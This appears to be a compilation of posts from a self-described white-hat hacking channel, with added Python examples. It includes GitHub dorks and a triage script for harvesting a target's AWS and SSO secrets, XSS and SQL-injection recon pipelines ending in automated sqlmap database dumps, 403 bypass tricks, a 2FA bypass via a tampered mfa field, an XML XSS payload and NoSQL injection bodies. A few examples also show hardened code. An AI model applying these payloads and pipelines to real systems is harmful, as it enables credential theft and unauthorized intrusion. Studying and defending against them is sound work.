#Beacon
Well-done cyberhack

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
GitHub dorks for AWS, Jira, Okta and similar secrets

org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
"target.com" password OR secret
"target.atlassian" password
"target.okta" password
"corp.target" password
"jira.target" password
"target.onelogin" password
target.service-now password
Sometimes just "target" on its own is enough.
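An added example, not part of the channel post: generate the dork list above for one org/domain pair and triage a returned file for real-looking AWS key material. The regexes, the `triage_hit` helper and the sample file content are my own; the sample values are the key pair from the AWS documentation, not a live credential.

```python
import re

# Assumed: the dork terms are the ones listed in the post above.
AWS_DORK_TERMS = [
    "bucket_name", "aws_access_key", "aws_secret_key", "S3_BUCKET",
    "S3_ACCESS_KEY_ID", "S3_SECRET_ACCESS_KEY", "S3_ENDPOINT",
    "AWS_ACCESS_KEY_ID", "list_aws_accounts",
]
SSO_HOSTS = ["atlassian", "okta", "onelogin", "service-now"]


def build_dorks(org, domain):
    """Return the GitHub code-search queries for one target (org + domain)."""
    corp = domain.split(".")[0]
    dorks = [f'org:{org} "{term}"' for term in AWS_DORK_TERMS]
    dorks.append(f'"{domain}" password OR secret')
    dorks += [f'"{corp}.{host}" password' for host in SSO_HOSTS]
    dorks += [f'"corp.{corp}" password', f'"jira.{corp}" password']
    return dorks


# Access key IDs: AKIA (long-term) or ASIA (temporary STS) + 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b")
# Secret keys are 40 base64-ish chars; only accept them next to an aws/s3 secret label
# to keep random hashes out of the triage output.
SECRET_RE = re.compile(
    r"(?i)(?:aws|s3)_?secret[^\n=:]*[=:]\s*['\"]?([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
)


def triage_hit(text):
    """Pull candidate key ids/secrets out of a file returned by a dork."""
    ids = ACCESS_KEY_RE.findall(text)
    secrets = SECRET_RE.findall(text)
    # A full pair is what turns a hit into a finding worth verifying (sts get-caller-identity).
    return {"access_key_ids": ids, "secrets": secrets, "pair": bool(ids and secrets)}


# Constructed sample hit; the values are the AWS documentation example credentials.
SAMPLE_HIT = (
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    "S3_BUCKET=target-prod-backups\n"
)

if __name__ == "__main__":
    for dork in build_dorks("Target", "target.com"):
        print(dork)
    print(triage_hit(SAMPLE_HIT))
```

Paste each generated line into GitHub code search (or the REST search endpoint) and run `triage_hit` over anything that comes back; the `pair` flag is the cue to validate the key against STS before reporting.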
Simple XSS

subfinder -d target.com | httprobe -c 100 > target.txt
cat target.txt | waybackurls | gf xss | kxss

gf xss keeps the archived URLs whose parameter names match its XSS pattern list; kxss then re-requests each one and reports which of the characters " ' < > come back unencoded for each parameter.
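An added example (not from the post) of the check kxss performs on the URLs that survive `gf xss`: put a canary around the characters an XSS payload needs, inject it into each parameter in turn and see which characters are echoed verbatim. `fetch` is a hypothetical HTTP client callback; `fake_fetch` is a constructed server that escapes one parameter and reflects another raw.

```python
import html
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

SPECIALS = '"\'<>'
CANARY = "kxss"


def probe_value():
    """Canary on both sides so the reflection window can be located in the body."""
    return CANARY + SPECIALS + CANARY


def unencoded_chars(body):
    """Return the special characters that appear verbatim between the two canaries."""
    start = body.find(CANARY)
    if start == -1:
        return ""
    end = body.find(CANARY, start + len(CANARY))
    if end == -1:
        return ""
    window = body[start + len(CANARY):end]
    return "".join(c for c in SPECIALS if c in window)


def check_url(url, fetch):
    """Probe every query parameter of `url`; fetch(url) must return the response body."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    findings = {}
    for i, (name, _) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, probe_value())          # one parameter at a time
        probe = urlunsplit(parts._replace(query=urlencode(mutated)))
        chars = unencoded_chars(fetch(probe))
        if chars:
            findings[name] = chars
    return findings


def fake_fetch(url):
    """Constructed target: `q` is HTML-escaped, `ref` is dropped raw into an href."""
    qs = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    q = html.escape(qs.get("q", ""))
    ref = qs.get("ref", "")
    return f'<input value="{q}"><a href="{ref}">back</a>'


if __name__ == "__main__":
    print(check_url("https://shop.target.com/search?q=shoes&ref=home", fake_fetch))
```

Only `ref` shows up, with all four characters reflected; `q` is escaped and is not reported. A parameter that reflects only `<>` still deserves a look (tag injection), while one that reflects only `"` may be exploitable inside an attribute.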
List of 12 Android security testing tools

Dex2JAR - Set of tools to work with Android Dex and Java CLASS files
ByteCodeView - Java & Android APK reverse engineering suite (decompiler, editor, debugger & more)
JADX - Dex to Java decompiler tools for producing Java source code from Android Dex and APK files
JD-GUI - A standalone graphical utility that displays Java sources from CLASS files
Drozer - A comprehensive security testing framework for Android
Baksmali - An assembler/disassembler for the Dex format used by Dalvik (Android's Java)
AndroGuard - A swiss army knife for analyzing, decompilation and reversing of Android apps
ApkTool - Another swiss army knife tool for reverse engineering Android apps
QARK - Tool to look for several security related Android application vulnerabilities
AndroBugs - Another analysis tool for identifying security vulnerabilities in Android applications
AppMon - An automated framework for monitoring and tampering system API calls of native macOS, iOS and Android apps
MobSF - An all-in-one automated mobile security framework supporting Android, iOS and Windows mobile apps
Tips on bypassing 403 and 401 errors

1. Header:
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

2. URL:
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

3. Method switching: change the method from GET to POST (or HEAD, PUT, etc.) and check whether the response changes.
4. Via IP, Vhost: request the same path against the server's IP address or another virtual host; the access rule is often bound to one hostname.
5. Fuzzing: brute-force further files and directories under the forbidden path; the rule may cover /admin but not /admin/login.
6. Adding headers: X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For (set to 127.0.0.1 or an internal address) for rules that whitelist by source IP.
7. Unicode characters in the path: case-folding or normalization differences between the front end and the back end.

Which of these work depends on how the edge (proxy, WAF, CDN) and the application server each normalize the path; the tricks are cheap to send, so send all of them and diff the responses.
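An added example, not from the post, of why the URL tricks in item 2 work. It models a hypothetical edge ACL that matches the raw path against `/admin`, and a backend that normalizes the way servlet containers do (a `;` starts a path parameter that is dropped, `%2e` decodes to `.`, dot segments are resolved). The rules are assumptions about a generic setup, not a statement about any product; the header and method variants are not modelled.

```python
from urllib.parse import unquote

PROTECTED = "/admin"


def _strip_query(raw):
    # Query string and fragment are not part of the path on either side.
    return raw.split("?", 1)[0].split("#", 1)[0]


def proxy_allows(raw_path):
    """Hypothetical edge ACL: blocks only the literal /admin prefix of the raw path."""
    path = _strip_query(raw_path)
    return not (path == PROTECTED or path.startswith(PROTECTED + "/"))


def backend_normalize(raw_path):
    """Servlet-container style normalization (assumed): decode, drop ;params, resolve dots."""
    path = unquote(_strip_query(raw_path))        # /%2e/admin -> /./admin
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]                # ..; -> ..   .; -> .   admin; -> admin
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def backend_protects(norm_path):
    """The route the backend actually serves as the protected admin area."""
    return norm_path == PROTECTED or norm_path.startswith(PROTECTED + "/")


def find_bypasses(candidates):
    """Paths the edge lets through that the backend still resolves onto /admin."""
    return [p for p in candidates
            if proxy_allows(p) and backend_protects(backend_normalize(p))]


# The URL variants from item 2 above.
CANDIDATES = [
    "/accessible/..;/admin", "/.;/admin", "/admin;/", "/admin/~",
    "/./admin/./", "/admin?param", "/%2e/admin", "/admin#",
]

if __name__ == "__main__":
    for p in CANDIDATES:
        print(f"{p:24} edge={'pass' if proxy_allows(p) else 'block':5} backend={backend_normalize(p)}")
    print("bypasses:", find_bypasses(CANDIDATES))
```

In this model the `;` and `%2e` variants slip through because the edge never sees a path that starts with `/admin`, while `/admin/~`, `/admin?param` and `/admin#` are blocked: those only help against an edge that matches the full path exactly or a backend that treats `~` specially.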
Multi-factor (2FA) authentication bypass

1. While 2FA is disabled:
Request:
{"email":"abc@gmail.com","password":"abc@123","mfa":null,"code":""}
Response:
Location: https://vulnerable-site.com/user/dashboard

2. While 2FA is enabled:

Request:
{"email":"abc@gmail.com","password":"abc@123","mfa":true,"code":""}
Response:
Location: https://vulnerable-site.com/v1/proxy/authentication/authenticate

3. With 2FA enabled, tamper with the request and send "mfa":null,"code":"" instead. If the response now redirects to /user/dashboard, the server is taking the client-supplied mfa flag as the truth instead of its own record of whether 2FA is enabled for the account.
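An added example, not from the post: server-side login handlers that reproduce the defect behind step 3 next to the corrected version. The user table, the response shape and both handlers are constructed; the real site's code is not known.

```python
import hmac

# Constructed user record: the account's MFA state lives here and nowhere else.
USERS = {
    "abc@gmail.com": {"password": "abc@123", "mfa_enabled": True},
}
DASHBOARD = "https://vulnerable-site.com/user/dashboard"
MFA_STEP = "https://vulnerable-site.com/v1/proxy/authentication/authenticate"


def _password_ok(user, supplied):
    # Constant-time compare; a real service compares against a password hash.
    return user is not None and hmac.compare_digest(user["password"], supplied)


def vulnerable_login(req):
    """Trusts the client-supplied `mfa` field to decide whether to challenge."""
    user = USERS.get(req.get("email", ""))
    if not _password_ok(user, req.get("password", "")):
        return 401, None
    if req.get("mfa"):                 # null / false from the client skips the second factor
        return 302, MFA_STEP
    return 302, DASHBOARD


def secure_login(req):
    """Decides from the server-side record; whatever the client sends in `mfa` is ignored."""
    user = USERS.get(req.get("email", ""))
    if not _password_ok(user, req.get("password", "")):
        return 401, None
    if user["mfa_enabled"]:
        return 302, MFA_STEP
    return 302, DASHBOARD


# The tampered request from step 3.
TAMPERED = {"email": "abc@gmail.com", "password": "abc@123", "mfa": None, "code": ""}

if __name__ == "__main__":
    print("vulnerable:", vulnerable_login(TAMPERED))
    print("secure:    ", secure_login(TAMPERED))
```

The same defect hides behind other client-controlled fields (`"mfa_verified": true`, `"step": "done"`); the fix is always the same: the second factor is a server-side state transition, not a request parameter.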
Top 20 search engines for hackers

censys.io – Censys Search Engine
shodan.io – Search engine for Internet-connected devices
viz.greynoise.io – GreyNoise Visualizer
zoomeye.org – Cyberspace Search Engine
onyphe.io – Cyber Defense Search Engine
wigle.net – Wireless Network Mapping
intelx.io – Intelligence X
fofa.so – Cyberspace Security Search Engine
hunter.io – OSINT Search Engine
zorexeye.com – Hacker’s Search Engine
pulsedive.com – Threat intelligence Search Engine
netograph.io – Mapping the deep structure of the web
vigilante.pw – Breached Database Directory
pipl.com – Search engine for real identity profiles
abuse.ch – Threat intelligence, malware, etc.
maltiverse.com – Open IoC Search Engine, Threat Intel
insecam.org – World biggest online cameras directory
spyse.com – Internet Assets Search Engine
dnsdumpster.com – DNS recon & research
phonebook.cz – Search for subdomains, email addresses, or URLs
XSS payload in an XML file

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

The namespace must be exactly http://www.w3.org/1999/xhtml or the browser will not treat the element as a script. The file has to be served from the target origin with an XML content type (typical for an upload endpoint that keeps the .xml extension) for the script to run.
Forwarded from SHADOW:Group
⚙️ Burp Suite extension for disclosing HTTP methods

Using other HTTP methods can help find new vulnerabilities and also gain access to pages that are otherwise forbidden.

The HTTP Methods Discloser extension sends an OPTIONS request and determines whether other HTTP methods are available besides the one in the original request.

If other methods are available, the request is highlighted in Proxy/HTTP History and the available HTTP methods are written into the Comment column.

#web #burp
Pinned: https://owasp.org/www-community/Source_Code_Analysis_Tools
nosqlmap.py --attack 2 --victim TARGET --webPort 80 --uri /URL --httpMethod POST --postData email,test@test.test,password,qwerty --injectedParameter 1 --injectSize 4 --injectFormat 2 --savePath output.log

--attack 2: use the NoSQL web application attacks
--victim TARGET: the target host (replace TARGET with the hostname)
--webPort 80: the target web server is listening on port 80
--uri /URL: the web path to attack
--httpMethod POST: use POST requests
--postData email,test@test.test,password,qwerty: the POST body as comma-separated name,value pairs
--injectedParameter 1: inject into the first parameter (as listed by NoSQLMap)
--injectSize 4: the injected random string values should be 4 characters long
--injectFormat 2: for injected strings, use the "letters only" format
--savePath output.log: save all findings to a file called output.log
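An added example, not from the post, of the class of bug NoSQLMap's web-application attacks look for: a JSON login body passed straight into a MongoDB-style query, so an attacker can replace a string with an operator object. The matcher, the user collection and both handlers are constructed; it imitates a small subset of Mongo's operators, it is not a Mongo client.

```python
import json
import re

# Constructed collection standing in for a Mongo `users` collection.
USERS = [
    {"email": "test@test.test", "password": "qwerty"},
    {"email": "admin@target.lan", "password": "S3cr3t!"},
]

# Subset of Mongo query operators, enough to show the two classic attacks.
_OPS = {
    "$ne": lambda value, arg: value != arg,
    "$gt": lambda value, arg: value is not None and value > arg,
    "$regex": lambda value, arg: isinstance(value, str) and re.search(arg, value) is not None,
}


def matches(value, cond):
    """A dict condition is an operator expression, anything else is equality."""
    if isinstance(cond, dict):
        return all(_OPS[op](value, arg) for op, arg in cond.items())
    return value == cond


def find_one(query):
    for doc in USERS:
        if all(matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def vulnerable_login(body):
    """Decoded JSON goes straight into the query: objects become operators."""
    data = json.loads(body)
    return find_one({"email": data["email"], "password": data["password"]})


def secure_login(body):
    """Only plain strings reach the query; an operator object is rejected up front."""
    data = json.loads(body)
    email, password = data.get("email"), data.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return None
    return find_one({"email": email, "password": password})


# Constructed request bodies.
NORMAL = '{"email": "test@test.test", "password": "qwerty"}'
INJECTED = '{"email": {"$ne": null}, "password": {"$ne": null}}'          # auth bypass
REGEX_PROBE = '{"email": "admin@target.lan", "password": {"$regex": "^S3"}}'  # blind extraction

if __name__ == "__main__":
    print("bypass:", vulnerable_login(INJECTED))
    print("regex probe hit:", vulnerable_login(REGEX_PROBE) is not None)
    print("hardened:", secure_login(INJECTED))
```

The `$ne` body logs in as the first user without a password; the `$regex` body answers yes/no to "does the admin password start with S3", which is how a password is pulled out one character at a time. NoSQLMap automates exactly these two probes against the parameter selected with `--injectedParameter`.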
#!/usr/bin/env bash
# usage: ./recon-sqli.sh target.com
amass enum --passive -d "$1" > amass
assetfinder --subs-only "$1" > assetfinder
subfinder -d "$1" > subfinder
cat amass assetfinder subfinder | sort -u > subs
httpx < subs > subs.alive
waybackurls < subs.alive > urls.check
gauplus < subs.alive | anew urls.check
hakrawler -depth 5 -plain < subs.alive | anew urls.check
gf sqli urls.check > urls.sqli
sqlmap -m urls.sqli --dbs --batch --random-agent

Update:
added recon with amass and assetfinder
removed gau
added gauplus and hakrawler
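An added example, not from the post, of the triage that belongs between `anew urls.check` and `sqlmap -m`: keep only URLs with parameter names worth injecting and collapse the crawl output to one URL per endpoint signature, so sqlmap does not test `product?id=1`, `product?id=2`, ... hundreds of times. The parameter list is my own subset of the names gf's sqli pattern covers (exact-match here, where gf uses substring patterns), and the URLs are constructed.

```python
from urllib.parse import parse_qsl, urlsplit

# Assumed subset of gf's sqli parameter names.
SQLI_PARAMS = {
    "id", "select", "report", "role", "update", "query", "user", "name", "sort",
    "where", "search", "params", "process", "row", "view", "table", "from", "sel",
    "results", "fetch", "order", "keyword", "column", "field", "delete", "string",
    "number", "filter",
}


def _param_names(url):
    return [k.lower() for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]


def is_sqli_candidate(url):
    """True when at least one query parameter name is on the list."""
    return bool(set(_param_names(url)) & SQLI_PARAMS)


def signature(url):
    """Endpoint identity: host + path + the set of parameter names, values ignored."""
    p = urlsplit(url)
    return (p.netloc.lower(), p.path, tuple(sorted(_param_names(url))))


def triage(urls):
    """gf-style filter plus dedupe by signature; returns the list to feed sqlmap -m."""
    first_seen = {}
    for url in urls:
        if not is_sqli_candidate(url):
            continue
        first_seen.setdefault(signature(url), url)   # keep the first URL per endpoint
    return sorted(first_seen.values())


# Constructed sample of what urls.check looks like after the crawlers run.
URLS = [
    "https://shop.target.com/product?id=1",
    "https://shop.target.com/product?id=2",
    "https://shop.target.com/product?id=3&ref=mail",
    "https://shop.target.com/static/app.js",
    "https://api.target.com/users?sort=asc",
    "http://blog.target.com/?p=12",
    "https://shop.target.com/search?q=shoes",
]

if __name__ == "__main__":
    for url in triage(URLS):
        print(url)
```

Three targets come out of seven inputs: `product?id=` once, `product?id=&ref=` once (a different signature, since the extra parameter may change the code path), and `users?sort=`. Write the result to urls.sqli in place of the plain `gf sqli` step.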
OK. Let's run through the useful tooling for studying sites and domains that was used while preparing the article.

themarkup.org/blacklight - finds the tracking and advertising modules embedded in a site
spyonweb.com - finds other sites that share the same advertising or analytics identifiers
whois.domaintools.com - one of the best WHOIS services
maxmind.com/en/geoip2-precision-demo - IP address lookup (geolocation)
domainbigdata.com - searches historical records and the domain owner's contact details
phonebook.cz - searches for subdomains, email addresses and URLs of a domain
spiderfoot.net - a specialized service for investigating internet resources
archive.org/web/ - saves a copy of a web page for forensic purposes

#КакOSINTить